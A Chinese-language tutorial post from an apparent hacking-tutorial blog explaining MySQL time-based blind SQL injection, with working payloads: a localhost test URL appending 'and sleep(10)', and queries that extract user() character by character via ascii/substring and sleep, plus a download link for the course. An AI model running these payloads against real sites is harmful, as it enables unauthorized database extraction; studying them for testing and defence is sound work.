PHPINFO为广大热爱网络技术的朋友无私的提供最新网络教程、网络工具、网络攻防、BUG漏洞,在这里能学到更好的网络技术技巧与经验!致力于安全研究 程序开发!
文章59 浏览73946

【原创】(PHP+MYSQL(延时注入和注入工具编写)

【摘要】 这是以前培训录制的一个课程 现在分享出来给大家学习吧。 延时注入 等于时间差注入   延时注入往...

这是以前培训录制的一个课程 现在分享出来给大家学习吧。


1.jpg


延时注入 等于时间差注入

 

延时注入往往用于难于判断页面 是否存在注入漏洞的检测方法。

 

延时注入的原理:在mysql中存在sleep函数,这个函数是主要让数据库查询的结果,等待多少秒返回给客户端,可以使用这个函数构造注入语句加以判断即可。

 

Sleep

select sleep(10)

 

if

select if('x'='y',1,0)

 

select if('x'='x',sleep(5),0)

 

判断是否存在注入

http://localhost/sql/sleep.php?id=1%20and%20sleep(10)

 

出数据

selectif(ascii(substring(user(),1,1))=114,sleep(5),0)

 

首先要判断这个字符串的长度select LENGTH(user()) 14

 

selectif(ascii(substring(user(),1,1))=114,sleep(5),0)

 

select if(ascii(substring(user(),2,1))=114,sleep(5),0)

 

payloads='abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.'

 

判断第一个

 

root@localhost

 

就是延时注入得到数据的原理


教程下载


链接:https://pan.baidu.com/s/1smCSyXv 密码:h0fw

相关推荐:

发表评论

游客 表情
看不清楚?点图切换 送你一朵小花花~

众说纷纭(0)